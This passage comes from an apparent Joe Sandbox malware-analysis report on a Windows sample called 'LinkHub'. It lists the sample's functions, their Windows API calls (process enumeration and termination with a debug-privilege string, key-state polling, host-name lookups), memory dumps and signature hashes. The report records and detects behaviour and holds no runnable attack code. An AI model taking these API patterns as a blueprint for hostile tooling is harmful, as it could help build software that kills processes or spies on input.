                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00261D95,?,?,00000000), ref: 00262190
                                                                                        • GetCurrentProcess.KERNEL32(00261D95,00000000,?,00261D95,?,?,00000000), ref: 00262198
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00261D95,?,?,00000000), ref: 0026219B
                                                                                        • CreateThread.KERNEL32(00000000,00000000,002621C1,00000000,00000000,00000000), ref: 002621B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: ee58d3c70257538de259df87f3c6d11b492e6aed4812bee578940e17001f2bd4
                                                                                        • Instruction ID: ff936fb8e945e2bf8a9c4a24b08bcf1a63f2c7f56910de8c3d797c7824abd9e9
                                                                                        • Opcode Fuzzy Hash: ee58d3c70257538de259df87f3c6d11b492e6aed4812bee578940e17001f2bd4
                                                                                        • Instruction Fuzzy Hash: 6F01BBB6240304BFEB10AFA5EC4DF6B7BACEB89711F404452FA09DB1A1CA749804DB24
                                                                                        Function 0026CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 002041EA: _wcslen.LIBCMT ref: 002041EF
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0026CF99
                                                                                        • _wcslen.LIBCMT ref: 0026CFE0
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0026D047
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0026D075
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                        • String ID: ,*-$0$<*-
                                                                                        • API String ID: 1227352736-1368983741
                                                                                        • Opcode ID: 42353a68eb69c1931ec427284fcc8fd64ad7ff37b1d950702159b08073da47bf
                                                                                        • Instruction ID: 08145576a4aea61a404dea57083bf71f17e33a05805ee8cac27286b94b0f012c
                                                                                        • Opcode Fuzzy Hash: 42353a68eb69c1931ec427284fcc8fd64ad7ff37b1d950702159b08073da47bf
                                                                                        • Instruction Fuzzy Hash: 7E511271B34306ABD710AF64D884B7BB7E8AF49314F040A2EF995D3191DBB0CCA58B52
                                                                                        Function 0028AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0026DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0026DDAC
                                                                                          • Part of subcall function 0026DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0026DDBA
                                                                                          • Part of subcall function 0026DD87: CloseHandle.KERNELBASE(00000000), ref: 0026DE87
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0028ABCA
                                                                                        • GetLastError.KERNEL32 ref: 0028ABDD
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0028AC10
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0028ACC5
                                                                                        • GetLastError.KERNEL32(00000000), ref: 0028ACD0
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028AD21
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: 77af76d04e7201412ebbd4de2d86f72ef51f5c9d2b7670f3768630da541536d5
                                                                                        • Instruction ID: 92458b8fe9438c1c75bc3f4bae5fd33623f8342160b0c433186c0821e431f32d
                                                                                        • Opcode Fuzzy Hash: 77af76d04e7201412ebbd4de2d86f72ef51f5c9d2b7670f3768630da541536d5
                                                                                        • Instruction Fuzzy Hash: 5A619D74225242AFE710EF14C485F16BBA4AF54308F18849EE4568B7E3CB71EC95CF92
                                                                                        Function 00294322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002943C1
                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 002943D6
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002943F0
                                                                                        • _wcslen.LIBCMT ref: 00294435
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00294462
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00294490
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 2147712094-78025650
                                                                                        • Opcode ID: 0552dfc6e60e3c5d991f2c7389fca2f0c8fc18a604cb510f1309df35df703272
                                                                                        • Instruction ID: 3f103f6d6452fb82a040bd144d9d88640d806727ab2f2635e0a342da3e5dc65e
                                                                                        • Opcode Fuzzy Hash: 0552dfc6e60e3c5d991f2c7389fca2f0c8fc18a604cb510f1309df35df703272
                                                                                        • Instruction Fuzzy Hash: 3F41C131910319ABDF21EFA4CC49FEA7BA9FF08350F10016AF948E7291D77099A1DB90
                                                                                        Function 0026C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0026C6C4
                                                                                        • IsMenu.USER32(00000000), ref: 0026C6E4
                                                                                        • CreatePopupMenu.USER32 ref: 0026C71A
                                                                                        • GetMenuItemCount.USER32(00AC6728), ref: 0026C76B
                                                                                        • InsertMenuItemW.USER32(00AC6728,?,00000001,00000030), ref: 0026C793
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                        • String ID: 0$2
                                                                                        • API String ID: 93392585-3793063076
                                                                                        • Opcode ID: d05c4480b6f0c7029e20b4d593502d149f81a8d91ec97e7be2c8c9aa504a6281
                                                                                        • Instruction ID: f8ddb75037e326a49ea540070970c181f7a6556f5e5220671cc2057928149726
                                                                                        • Opcode Fuzzy Hash: d05c4480b6f0c7029e20b4d593502d149f81a8d91ec97e7be2c8c9aa504a6281
                                                                                        • Instruction Fuzzy Hash: F951B0706112069BDF12EF68D888BBEFBFCAF54314F34412AE89197291D7709990CF61
                                                                                        Function 002019CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 002019E1
                                                                                        • ScreenToClient.USER32(00000000,?), ref: 002019FE
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00201A23
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00201A3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID: $' $$'
                                                                                        • API String ID: 4210589936-2353634435
                                                                                        • Opcode ID: b3ad7db5a1926513fffc264ea7e46c0765f1be609a550fc1f9c12ed3cf3af8a8
                                                                                        • Instruction ID: f4f69079f2b001b4f7ae1882e5fd6abcaf59c40671a2a8fc065d83da40818e17
                                                                                        • Opcode Fuzzy Hash: b3ad7db5a1926513fffc264ea7e46c0765f1be609a550fc1f9c12ed3cf3af8a8
                                                                                        • Instruction Fuzzy Hash: 42414E71A1420ABFDF19DF64D844BEEB774FF05324F20821AE429A22D1C7706A64DF51
                                                                                        Function 00201B00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • BeginPaint.USER32(?,?,?), ref: 00201B35
                                                                                        • GetWindowRect.USER32(?,?), ref: 00201B99
                                                                                        • ScreenToClient.USER32(?,?), ref: 00201BB6
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00201BC7
                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00201C15
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00243287
                                                                                          • Part of subcall function 00201C2D: BeginPath.GDI32(00000000), ref: 00201C4B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                        • String ID: (-
                                                                                        • API String ID: 3050599898-4239615555
                                                                                        • Opcode ID: 6064822e4a15e852ae35b625979c45436acf7ceef002eddfec7ad1b29cda33f0
                                                                                        • Instruction ID: 1c4b61a3826ab2dc2eb3dc2bbf965e0f97a21412286439dcb0b5180843352660
                                                                                        • Opcode Fuzzy Hash: 6064822e4a15e852ae35b625979c45436acf7ceef002eddfec7ad1b29cda33f0
                                                                                        • Instruction Fuzzy Hash: 4E41E030515301AFD710DF24EC88FBA7BA8EB55324F10066AFA54872E2C7709C69DB62
                                                                                        Function 002986FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00298740
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00298765
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0029877D
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 002987A6
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0027C1F2,00000000), ref: 002987C6
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 002987B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID: (-
                                                                                        • API String ID: 2294984445-4239615555
                                                                                        • Opcode ID: 5babe21eacb50c2cb9024e744de31c839ca5fec53f6785c2894a13fa8f7d060a
                                                                                        • Instruction ID: 41e5db88ca8a65684193b0201ed8b99f2d37ef6d0faae04f903823e8ba33566b
                                                                                        • Opcode Fuzzy Hash: 5babe21eacb50c2cb9024e744de31c839ca5fec53f6785c2894a13fa8f7d060a
                                                                                        • Instruction Fuzzy Hash: 65219775520242DFCF145F78DC48AAAB7A5EB45325F39462EF926D21E0EE309861DB10
                                                                                        Function 0026D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0026D1BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 81bfe60f9f5f59db67beb512ec857cfb1239d0525b94b2ec51873d31a0186162
                                                                                        • Instruction ID: d3cb5f77a5f294c2b8a9fe6c4ec128a947e28580eda7718b366e72bd3be99b11
                                                                                        • Opcode Fuzzy Hash: 81bfe60f9f5f59db67beb512ec857cfb1239d0525b94b2ec51873d31a0186162
                                                                                        • Instruction Fuzzy Hash: 3411EC35BBC31FBAE7155F64EC82EAA779CDF07760B2000AAF508A61C1D7F45AA145A0
                                                                                        Function 0026E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 642191829-3771769585
                                                                                        • Opcode ID: a34c1703c6a900ca9e2e4b13915bd2dcdb3e45adc26490c7a22e2ee865762500
                                                                                        • Instruction ID: 37d6e8d93fe9c0463f3a09f6e25dff342f9b8a757c00bb6b043e9085429c13c5
                                                                                        • Opcode Fuzzy Hash: a34c1703c6a900ca9e2e4b13915bd2dcdb3e45adc26490c7a22e2ee865762500
                                                                                        • Instruction Fuzzy Hash: 1511D6359241257BDF217BA4EC4EEDEB7ACEF01710F020176F605A6091EFB48AE19E50
                                                                                        Function 0026F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 952045576-0
                                                                                        • Opcode ID: fb37a82e4739fc08f07716ca269dc1ece15b1f2b80618347759d98d40cda01b3
                                                                                        • Instruction ID: b8c84ce4849b4754767a5d603ecf0a8e57476c254252fa0d51a4bbcfb01c0f25
                                                                                        • Opcode Fuzzy Hash: fb37a82e4739fc08f07716ca269dc1ece15b1f2b80618347759d98d40cda01b3
                                                                                        • Instruction Fuzzy Hash: D741A565C20225B5CB11EBF8EC8AADFB76CAF05310F504462F508E3121FA74D271C7A6
                                                                                        Function 0029379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 002937B7
                                                                                        • GetDC.USER32(00000000), ref: 002937BF
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002937CA
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 002937D6
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00293812
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00293823
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00296504,?,?,000000FF,00000000,?,000000FF,?), ref: 0029385E
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0029387D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: 9b4bbf7c9c3ed0c2f170ed09db524b624dc4794f9a6ac3657b6bd39cd025773b
                                                                                        • Instruction ID: 52c3f32b8d678efb1a698ba25346b4b304b08f6f01a621def83f0941a9812ece
                                                                                        • Opcode Fuzzy Hash: 9b4bbf7c9c3ed0c2f170ed09db524b624dc4794f9a6ac3657b6bd39cd025773b
                                                                                        • Instruction Fuzzy Hash: A6318B76211214BFEF118F50DC8AFEB3BADFF49751F044066FE089A291C6B59851CBA0
                                                                                        Function 00285A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: 8f815e854c73d2d4916aecfaa16c1c92cde27ec52fc33f549c527c08f29fbfc6
                                                                                        • Instruction ID: b3dfa429a6ff2b37fd1204990d06761fa4a194b619001db4831af45fe43e443d
                                                                                        • Opcode Fuzzy Hash: 8f815e854c73d2d4916aecfaa16c1c92cde27ec52fc33f549c527c08f29fbfc6
                                                                                        • Instruction Fuzzy Hash: 12D1D079A1161A9FDF10EFA8C885BAEB7B5FF48304F148069E905AB280E770ED51CB50
                                                                                        Function 002418A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0024194E
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002419D1
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00241B7B,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00241A64
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00241A7B
                                                                                          • Part of subcall function 00233B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233BC5
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00241B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00241AF7
                                                                                        • __freea.LIBCMT ref: 00241B22
                                                                                        • __freea.LIBCMT ref: 00241B2E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                        • String ID:
                                                                                        • API String ID: 2829977744-0
                                                                                        • Opcode ID: 02e1644c195e09d563450d9ef470099f04c526ef126d3e8fafe1460dc9697c17
                                                                                        • Instruction ID: 0b04151bc32c5cfc3ec9d7b2747bd29e15aa807396d2c86c6d0f3e0371552141
                                                                                        • Opcode Fuzzy Hash: 02e1644c195e09d563450d9ef470099f04c526ef126d3e8fafe1460dc9697c17
                                                                                        • Instruction Fuzzy Hash: E891D572E202169ADB298E64CC95AEE7BB5EF09314F180559E905E7180E774DDF0CB60
                                                                                        Function 00284F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
